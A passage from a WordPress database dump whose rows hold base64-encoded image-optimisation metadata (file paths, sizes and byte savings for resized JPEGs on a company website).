WJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NvbmZvcm1hbC0yLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5NjI4LCJpZCI6MTkxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29uZm9ybWFsLTItNjAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb25mb3JtYWwtMi02MDB4NDAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NvbmZvcm1hbC0yLTYwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5NjMwLCJpZCI6MTkxfV0='); 
INSERT INTO `wp_postmeta` VALUES (30327, 183, 'wpfc_optimisation_reduction', '18358'); 
INSERT INTO `wp_postmeta` VALUES (30328, 183, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcmVsZWFzZTY2LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcmVsZWFzZTY2LmpwZyIsIndpZHRoIjo0MDAsImhlaWdodCI6MzAwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvcmVsZWFzZTY2LmpwZyIsInJlZHVjdGlvbiI6MTgzNDksInRpbWUiOjE0ODM1ODk2MzcsImlkIjoiMTgzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMzQweDMwMC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjMwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMzQweDMwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMzQweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk2MzksImlkIjoxODN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcmVsZWFzZTY2LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcmVsZWFzZTY2LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvcmVsZWFzZTY2LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5NjQxLCJpZCI6MTgzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3JlbGVhc2U2Ni0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3JlbGVhc2U2Ni0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3JlbGVhc2U2Ni0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTY0MywiaWQiOjE4M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk2NDUsImlkIjoxODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk2NDgsImlkIjoxODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk2NTAsImlkIjoxODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk2NTIsImlkIjoxODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9yZWxlYXNlNjYtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk2NTQsImlkIjoxODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlNjYtNDAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlNjYtNDAweDMwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9yZWxlYXNlNjYtNDAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk2NTYsImlkIjoxODN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30329, 181, 'wpfc_optimisation_reduction', '18170'); 
INSERT INTO `wp_postmeta` VALUES (30330, 181, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLmpwZyIsIndpZHRoIjo2MDAsImhlaWdodCI6NDUwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLmpwZyIsInJlZHVjdGlvbiI6MTgxNTksInRpbWUiOjE0ODM1ODk2NjMsImlkIjoiMTgxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9wdGZlX2x1YnJpY2FudHMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9wdGZlX2x1YnJpY2FudHMtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9wdGZlX2x1YnJpY2FudHMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk2NjUsImlkIjoxODF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5NjY4LCJpZCI6MTgxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3B0ZmVfbHVicmljYW50cy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3B0ZmVfbHVicmljYW50cy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3B0ZmVfbHVicmljYW50cy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTY3MCwiaWQiOjE4MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9wdGZlX2x1YnJpY2FudHMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9wdGZlX2x1YnJpY2FudHMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9wdGZlX2x1YnJpY2FudHMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk2NzIsImlkIjoxODF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTUxMHg0NTAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo0NTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTUxMHg0NTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTUxMHg0NTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5Njc0LCJpZCI6MTgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5Njc2LCJpZCI6MTgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5Njc4LCJpZCI6MTgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5NjgxLCJpZCI6MTgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5NjgzLCJpZCI6MTgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5Njg1LCJpZCI6MTgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTYwMHg0NTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTYwMHg0NTAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI0NTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvcHRmZV9sdWJyaWNhbnRzLTYwMHg0NTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5Njg4LCJpZCI6MTgxfV0='); 
INSERT INTO `wp_postmeta` VALUES (30331, 144, 'wpfc_optimisation_reduction', '24707'); 
INSERT INTO `wp_postmeta` VALUES (30332, 144, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIxNTQ3NjE3LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIxNTQ3NjE3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjgxNywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMTU0NzYxNy5qcGciLCJyZWR1Y3Rpb24iOjI0NjkzLCJ0aW1lIjoxNDgzNTg5Njk2LCJpZCI6IjE0NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIxNTQ3NjE3LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIxNTQ3NjE3LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIxNTQ3NjE3LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5Njk5LCJpZCI6MTQ0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMTU0NzYxNy04MDB4NDA5LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NDA5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMTU0NzYxNy04MDB4NDA5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMTU0NzYxNy04MDB4NDA5LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTcwMSwiaWQiOjE0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctNzY4eDM5Mi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjM5MiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctNzY4eDM5Mi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctNzY4eDM5Mi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk3MDQsImlkIjoxNDR9LHsiZmlsZSI6IlwvaG